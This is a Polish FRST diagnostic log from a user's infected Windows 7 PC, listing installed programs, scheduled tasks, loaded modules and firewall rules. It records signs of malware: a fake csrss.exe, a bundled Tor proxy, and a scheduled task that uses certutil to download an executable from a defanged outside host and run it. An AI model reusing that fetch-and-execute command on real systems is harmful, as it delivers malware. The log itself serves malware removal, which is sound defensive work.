Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 16.05.2018 01
Uruchomiony przez Bartek (22-05-2018 17:09:46)
Uruchomiony z C:\Users\Bartek\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2016-08-25 20:31:33)
Tryb startu: Normal
==========================================================

==================== Konta użytkowników: =============================

Administrator (S-1-5-21-360975752-3786565279-1083807947-500 - Administrator - Disabled)
Bartek (S-1-5-21-360975752-3786565279-1083807947-1001 - Administrator - Enabled) => C:\Users\Bartek
Gość (S-1-5-21-360975752-3786565279-1083807947-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-360975752-3786565279-1083807947-1002 - Limited - Enabled)

==================== Centrum zabezpieczeń ========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie.)

AV: Microsoft Security Essentials (Disabled - Out of date) {768124D7-F5F7-6D2F-DDC2-94DFA4017C95}
AS: Microsoft Security Essentials (Disabled - Out of date) {CDE0C533-D3CD-62A1-E772-AFADDF863628}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Zainstalowane programy ======================

(W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.)

µTorrent (HKU\S-1-5-21-360975752-3786565279-1083807947-1001\...\uTorrent) (Version: 3.5.1.44332 - BitTorrent Inc.)
Aktualizacje NVIDIA 2.13.0.21 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 2.13.0.21 - NVIDIA Corporation) Hidden
ATK Package (HKLM-x32\...\{AB5C933E-5C7D-4D30-B314-9C83A49B94BE}) (Version: 1.0.0020 - ASUS)
CCleaner (HKLM\...\CCleaner) (Version: 5.21 - Piriform)
ChallengeMe.GG Client version 1.5 (HKLM-x32\...\{7A91C052-5E4E-441C-A3A5-84B100B98166}_is1) (Version: 1.5 - CME.GG)
CLEO 4.3 (HKLM-x32\...\{A8F37EB0-C741-41D7-8CAB-5B40ECEEF094}_is1) (Version: 4.3 - Seemann, Deji, Alien)
CloudNet (HKU\S-1-5-21-360975752-3786565279-1083807947-1001\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== UWAGA
CodeBlocks (HKU\S-1-5-21-360975752-3786565279-1083807947-1001\...\CodeBlocks) (Version: 16.01 - The Code::Blocks Team)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.4.0.0192 - Disc Soft Ltd)
Fraps (remove only) (HKLM-x32\...\Fraps) (Version: - )
Gameforge Live 2.0.13 (HKLM-x32\...\{9C98989A-3A15-42DA-A3B9-D20331437D67}}_is1) (Version: 2.0.13 - Gameforge)
GIMP 2.8.18 (HKLM\...\GIMP-2_is1) (Version: 2.8.18 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 66.0.3359.181 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.17 - Google Inc.) Hidden
GTA San Andreas (HKLM-x32\...\{D417C96A-FCC7-4590-A1BB-FAF73F5BC98E}) (Version: 1.00.00001 - Rockstar Games)
Heroes of Might and Magic III (HKLM-x32\...\{8B743AA0-53B2-11D2-808A-00600895FB43}) (Version: 1.0 - )
Heroes of Might and Magic V - Dzikie Hordy (HKLM-x32\...\{ACC75323-DB4A-4f7f-9AF3-1D1DEFF2D1B5}_is1) (Version: - Ubisoft)
Heroes of Might and Magic V - Tribes of the East (HKLM-x32\...\{ACC75323-DB4A-4F7F-9AF3-1D1DEFF2D1B5}) (Version: - )
HiSuite (HKLM-x32\...\Hi Suite) (Version: 1.0 - Huawei Technologies Co.,Ltd)
Java 7 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217051FF}) (Version: 7.0.510 - Oracle)
Malwarebytes Anti-Malware wersja 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Metin2 (HKLM-x32\...\Metin2_PL_is1) (Version: - Gameforge 4D GmbH)
Microsoft .NET Framework 4.6.1 (PLK) (HKLM\...\{D93AC424-07D7-3992-B0C8-BDCB79173757}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Hotfix Rollup (KB3146716) (HKLM\...\{E026AF51-E2EB-33CF-AC15-09308053FAA7}) (Version: 4.6.01078 - Microsoft Corporation)
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23026 (HKLM-x32\...\{74d0e5db-b326-4dae-a6b2-445b9de1836e}) (Version: 14.0.23026.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Movie Maker (HKLM-x32\...\{38F03569-A636-4CF3-BDDE-032C8C251304}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{DD67BE4B-7E62-4215-AFA3-F123A800A389}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 55.0.3 (x86 pl) (HKLM-x32\...\Mozilla Firefox 55.0.3 (x86 pl)) (Version: 55.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 52.0.2 - Mozilla)
MTA:SA v1.5.4 (HKLM-x32\...\MTA:SA 1.5) (Version: v1.5.4 - Multi Theft Auto)
Narzędzia sprawdzające pakietu Microsoft Office 2016 — polski (HKLM\...\{90160000-001F-0415-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Need For Speed Underground 2 version 1.2.0.0 (HKLM-x32\...\Need For Speed Underground 2_is1) (Version: 1.2.0.0 - Mr DJ)
NVIDIA GeForce Experience 3.0.7.34 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.0.7.34 - NVIDIA Corporation)
NVIDIA Oprogramowanie systemu PhysX 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
NVIDIA Sterownik 3D Vision 341.98 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 341.98 - NVIDIA Corporation)
NVIDIA Sterownik dźwięku HD 1.3.30.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.30.1 - NVIDIA Corporation)
NVIDIA Sterownik graficzny 341.98 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 341.98 - NVIDIA Corporation)
NvNodejs (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvNodejs) (Version: 3.0.7.34 - NVIDIA Corporation) Hidden
NvTelemetry (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvTelemetry) (Version: 1.0.0.0 - NVIDIA Corporation) Hidden
Overwolf.Setup.VC100CRTx64.Dist (HKLM\...\{EC9D5554-6852-4A55-81BB-AC02C7A8CFED}) (Version: 1.0.0 - Overwolf)
Overwolf.Setup.VC100CRTx86.Dist (HKLM-x32\...\{8989DBC1-E87B-448F-9147-57EEEC5A24A5}) (Version: 1.0.0 - Overwolf) Hidden
Panel sterowania NVIDIA 341.98 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 341.98 - NVIDIA Corporation) Hidden
SafeFinder (HKLM-x32\...\{DAEBEC7B-840B-42CA-A61E-90AF801F52BE}) (Version: 1.0.0.0 - Linkury) <==== UWAGA
SHIELD Streaming (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_GFExperience.NvStreamSrv) (Version: 7.1.0320 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_ShieldWirelessController) (Version: 3.0.7.34 - NVIDIA Corporation) Hidden
SHU (HKLM-x32\...\{DF11DD92-DBB8-4F3F-9564-A8BBDBE986F5}_is1) (Version: 1.0 - ScreenShu Software)
Skype™ 7.28 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.28.101 - Skype Technologies S.A.)
Spotify (HKU\S-1-5-21-360975752-3786565279-1083807947-1001\...\Spotify) (Version: 1.0.63.617.g5aca9a2a - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.1.8 - TeamSpeak Systems GmbH)
TS Notifier (HKLM-x32\...\{D88D739F-72B4-48A7-A37D-12AD10A3B0EA}) (Version: 1.6.0004 - Andreas Gebert)
Update for Skype for Business 2016 (KB3114696) 64-Bit Edition (HKLM\...\{90160000-0011-0000-1000-0000000FF1CE}_Office16.PROPLUS_{7A411660-6F59-4704-B90D-E37E20790CF2}) (Version: - Microsoft)
Update for Skype for Business 2016 (KB3114696) 64-Bit Edition (HKLM\...\{90160000-00C1-0000-1000-0000000FF1CE}_Office16.PROPLUS_{7A411660-6F59-4704-B90D-E37E20790CF2}) (Version: - Microsoft)
Update for Skype for Business 2016 (KB3114696) 64-Bit Edition (HKLM\...\{90160000-012B-0415-1000-0000000FF1CE}_Office16.PROPLUS_{7A411660-6F59-4704-B90D-E37E20790CF2}) (Version: - Microsoft)
UsbFix (HKLM-x32\...\Usbfix) (Version: 9.001 - www.SOSVirus.Net)
VBCABLE, The Virtual Audio Cable (HKLM\...\VB:VBCABLE {87459874-1236-4469}) (Version: - VB-Audio Software)
Vegas Pro 11.0 (64-bit) (HKLM\...\{7DA57CC0-029B-11E2-A4C0-F04DA23A5C58}) (Version: 11.0.701 - Sony)
Winamp (HKLM-x32\...\Winamp) (Version: 5.666 - Nullsoft, Inc)
Windows Movie Maker 2016 (HKLM-x32\...\{3CC29C1A-B5FE-457B-8F22-32A2videowin}}_is1) (Version: - videowinsoft.com)
WinRAR 5.40 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
WinSCP 5.9.5 (HKLM-x32\...\winscp3_is1) (Version: 5.9.5 - Martin Prikryl)

==================== Niestandardowe rejestracje CLSID (filtrowane): ==========================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers1-x32-x32: [WipeFiles] -> {ED09987C-E386-4F1A-9A52-09A6B659B45F} => D:\Program Files\UndeleteMyFiles\WipeExt.dll -> Brak pliku
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => D:\Program Files\malwarebytes\Malwarebytes Anti-Malware\mbamext.dll [2016-03-10] (Malwarebytes)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2016-09-12] (NVIDIA Corporation)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => D:\Program Files\malwarebytes\Malwarebytes Anti-Malware\mbamext.dll [2016-03-10] (Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers6-x32-x32: [WipeFiles] -> {ED09987C-E386-4F1A-9A52-09A6B659B45F} => D:\Program Files\UndeleteMyFiles\WipeExt.dll -> Brak pliku

==================== Zaplanowane zadania (filtrowane) =============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
Task: {03F54856-B1D0-4631-A1D7-B0E70B5EF565} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2016-09-30] (NVIDIA Corporation)
Task: {1FB32D12-1B1B-4F14-85EB-8F479C5338F9} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2015-07-31] (Microsoft Corporation)
Task: {2B9B6578-30B3-4BA4-A951-05FA772FA9DA} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2016-09-30] (NVIDIA Corporation)
Task: {4600FA77-1D45-4116-975F-9B2ADD20CDB1} - System32\Tasks\MRT => C:\Users\Bartek\AppData\Local\Temp\csrss\mrt.exe [2018-05-22] () <==== UWAGA
Task: {47C5BB9A-FCB4-477E-844D-18572951D8A9} - System32\Tasks\{56587220-312E-41C2-8F2C-2A86F3DA23AF} => C:\Windows\system32\pcalua.exe -a "E:\Bartek\Gry\Heroes 5\Heroes of Might & Magic V - Dzikie Hordy\Patche\heroes_might_magic_5_3.01_pl.exe" -d "E:\Bartek\Gry\Heroes 5\Heroes of Might & Magic V - Dzikie Hordy\Patche"
Task: {4B98CD12-2DBA-45F9-A8AE-672F535B7F31} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2016-09-30] (NVIDIA Corporation)
Task: {68DC3756-AA8C-4DB7-A617-E576EF866BB9} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [2015-07-31] (Microsoft Corporation)
Task: {6ED71622-BAE2-46F5-B7DD-0F4226095FF6} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [2015-07-31] (Microsoft Corporation)
Task: {9909E866-222B-43BC-8F22-5C80C74D438F} - System32\Tasks\ATKOSD2 => C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe [2012-06-25] (ASUSTek Computer Inc.)
Task: {A281CE71-DA24-40E8-9FBB-DD7D5733146C} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2016-09-30] (NVIDIA Corporation)
Task: {ABDB4510-54FD-476C-97F9-8E68A1BFB964} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-21] () <==== UWAGA
Task: {BD3B26C8-4720-4D01-AB5D-CEAE6C3175F8} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {BDF11CB4-5603-408F-B9B3-36B5804EE85F} - System32\Tasks\{D2DE5D13-9581-4CB6-A3AE-A21E739A4BCA} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Common Files\Doublebam\uninstall.exe" -d "C:\Program Files (x86)\Common Files\Doublebam"
Task: {C8B15871-9EBF-4859-B0D4-2D6951174F51} - System32\Tasks\vgokv => C:\Users\Bartek\AppData\Roaming\zmzol\vgokv.vbs [2018-05-21] ()
Task: {E84D1B0B-8656-47F4-A27C-0C0891DC1BFE} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe
Task: {E85D7F66-B287-471E-8866-924BBBDCCABA} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2016-09-30] (NVIDIA Corporation)
Task: {F1AA8920-6EFA-400E-B69E-BC88E72E1BF7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/3/app.exe C:\Users\Bartek\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Bartek\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
Task: {F247C00D-3C91-4876-9803-CA8880E6C4AF} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: {F6611422-8064-4DED-9E78-6A62C6FAB526} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2016-09-30] (NVIDIA Corporation)
Task: {F82BA063-5AA1-4BC1-BFF7-960C1BED32DA} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-08-05] (Piriform Ltd)

(Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.)

==================== Skróty & WMI ========================

(Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.)

ShortcutWithArgument: C:\Users\Bartek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Bartek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikacje Chrome\GeForce Experience Stream Client.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=gjljknijpnfibppaijefibndmiabonep
ShortcutWithArgument: C:\Users\Bartek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%
ShortcutWithArgument: C:\Users\Bartek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Bartek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP%
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> %SNF%

==================== Załadowane moduły (filtrowane) ==============

2016-08-27 11:57 - 2016-09-12 22:00 - 000133568 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2017-07-26 09:58 - 2017-07-26 09:58 - 000192200 _____ () C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe
2016-10-13 19:44 - 2016-09-30 06:25 - 001148984 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-10-13 19:44 - 2016-09-30 06:25 - 004490808 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\Poco.dll
2016-10-13 19:45 - 2016-09-30 06:25 - 000419896 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\plugins\LocalSystem\_nvspserviceplugin64.dll
2018-05-21 15:17 - 2018-05-21 15:17 - 003630080 _____ () C:\Users\Bartek\AppData\Local\Temp\csrss\proxy\Tor\tor.exe
2018-05-21 14:17 - 2018-05-21 14:17 - 001377280 ____H () C:\Windows\windefender.exe
2018-05-21 14:17 - 2018-05-21 14:17 - 003173376 _____ () C:\Windows\rss\csrss.exe
2018-05-22 14:30 - 2018-05-22 14:30 - 001484800 _____ () C:\Users\Bartek\AppData\Local\Temp\csrss\mrt.exe
2018-05-22 14:25 - 2018-05-22 16:22 - 001042432 _____ () C:\Users\Bartek\AppData\Local\Temp\wup\wup.exe
2018-01-22 12:34 - 2018-01-22 12:34 - 000174744 _____ () E:\Bartek\programy\teamspeak\quazip.dll
2017-10-13 13:17 - 2017-10-13 13:17 - 000020632 _____ () E:\Bartek\programy\teamspeak\libEGL.DLL
2017-10-13 13:17 - 2017-10-13 13:17 - 001981592 _____ () E:\Bartek\programy\teamspeak\libGLESv2.dll
2018-01-22 12:34 - 2018-01-22 12:34 - 000125592 _____ () E:\Bartek\programy\teamspeak\soundbackends\directsound_win64.dll
2018-01-22 12:34 - 2018-01-22 12:34 - 000150680 _____ () E:\Bartek\programy\teamspeak\soundbackends\windowsaudiosession_win64.dll
2018-05-16 12:31 - 2018-05-15 05:13 - 004443992 _____ () C:\Program Files (x86)\Google\Chrome\Application\66.0.3359.181\libglesv2.dll
2018-05-16 12:31 - 2018-05-15 05:13 - 000099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\66.0.3359.181\libegl.dll
2018-05-21 15:17 - 2018-05-21 15:17 - 000107520 _____ () C:\Users\Bartek\AppData\Local\Temp\csrss\proxy\Tor\zlib1.dll
2018-05-21 15:17 - 2018-05-21 15:17 - 000093095 _____ () C:\Users\Bartek\AppData\Local\Temp\csrss\proxy\Tor\libssp-0.dll
2018-05-21 15:17 - 2018-05-21 15:17 - 000717225 _____ () C:\Users\Bartek\AppData\Local\Temp\csrss\proxy\Tor\libevent-2-0-5.dll
2018-05-21 15:17 - 2018-05-21 15:17 - 000523022 _____ () C:\Users\Bartek\AppData\Local\Temp\csrss\proxy\Tor\libgcc_s_sjlj-1.dll
2016-10-13 19:44 - 2016-09-30 06:25 - 000020536 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll

==================== Alternate Data Streams (filtrowane) =========

(Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.)

AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\ProgramData:NT2 [432]
AlternateDataStreams: C:\Users\All Users:NT [40]
AlternateDataStreams: C:\Users\All Users:NT2 [432]
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT2 [432]
AlternateDataStreams: C:\ProgramData\Dane aplikacji:NT [40]
AlternateDataStreams: C:\ProgramData\Dane aplikacji:NT2 [432]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [432]
AlternateDataStreams: C:\ProgramData\TEMP:9482CFB4 [268]
AlternateDataStreams: C:\Users\Bartek\Dane aplikacji:NT [40]
AlternateDataStreams: C:\Users\Bartek\Dane aplikacji:NT2 [432]
AlternateDataStreams: C:\Users\Bartek\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\Bartek\AppData\Roaming:NT2 [432]

==================== Tryb awaryjny (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.)

==================== Powiązania plików (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.)

==================== Internet Explorer - Witryny zaufane i z ograniczeniami ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.)

==================== Hosts - zawartość: ===============================

(Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.)

2009-07-14 04:34 - 2017-09-22 21:08 - 000000035 _____ C:\Windows\system32\Drivers\etc\hosts

==================== Inne obszary ============================

(Obecnie brak automatycznej naprawy dla tej sekcji.)

HKU\S-1-5-21-360975752-3786565279-1083807947-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Bartek\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 8.8.8.8
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: )
Zapora systemu Windows [funkcja włączona]

==================== MSCONFIG/TASK MANAGER - Wyłączone elementy ==

MSCONFIG\startupreg: ATKMEDIA => C:\Program Files (x86)\ASUS\ATK Package\ATK Media\DMedia.exe
MSCONFIG\startupreg: ATKOSD2 => C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe
MSCONFIG\startupreg: BlueStacks Agent => C:\Program Files (x86)\BlueStacks\HD-Agent.exe
MSCONFIG\startupreg: CCleaner Monitoring => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: DAEMON Tools Lite Automount => "D:\daemon tools\DAEMON Tools Lite\DTAgent.exe" -autorun
MSCONFIG\startupreg: HControlUser => C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControlUser.exe
MSCONFIG\startupreg: ShadowPlay => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
MSCONFIG\startupreg: Spotify Web Helper => C:\Users\Bartek\AppData\Roaming\Spotify\SpotifyWebHelper.exe --autostart
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

==================== Reguły Zapory systemu Windows (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

FirewallRules: [TCP Query User{0AEC30EB-B918-4DB5-892B-0658B46AA86D}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [UDP Query User{6523B268-0560-4E69-B66C-AAE9EFB6B593}C:\program files (x86)\google\chrome\application\chrome.exe] => (Allow) C:\program files (x86)\google\chrome\application\chrome.exe
FirewallRules: [TCP Query User{BF99C846-3057-4B75-8BC9-2742298FE564}C:\users\bartek\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\bartek\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [UDP Query User{882D95DE-DE31-4FE0-981D-BA4F0E286685}C:\users\bartek\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\bartek\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [TCP Query User{42257498-8A58-4E72-A670-3C835324FE09}E:\bartek\programy\winamp\winamp.exe] => (Allow) E:\bartek\programy\winamp\winamp.exe
FirewallRules: [UDP Query User{A8043E09-A3E3-4816-9FE8-368A9C39509F}E:\bartek\programy\winamp\winamp.exe] => (Allow) E:\bartek\programy\winamp\winamp.exe
FirewallRules: [{CC24B25B-501B-428C-87E8-B682D96A1F77}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe
FirewallRules: [{21118DDD-7180-42C8-AF3D-C8432A07A624}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe
FirewallRules: [{13F78737-443D-4FE6-A75F-853288ADC293}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe
FirewallRules: [{197C28D9-AB6E-4690-9F4C-AC60F51D4ABD}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe
FirewallRules: [TCP Query User{314EF0BF-267C-4CC9-8399-7F70C486178C}C:\users\bartek\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\bartek\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{F93416D4-F3D3-4203-A8A1-087050724A0D}C:\users\bartek\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\bartek\appdata\roaming\spotify\spotify.exe
FirewallRules: [{A505C5FC-C796-4932-9C8F-5A1CFC2B5B38}] => (Allow) E:\Bartek\Gry\steam\steam\Steam.exe
FirewallRules: [{25802D65-D25E-431A-A6E6-4C649D36EFCA}] => (Allow) E:\Bartek\Gry\steam\steam\Steam.exe
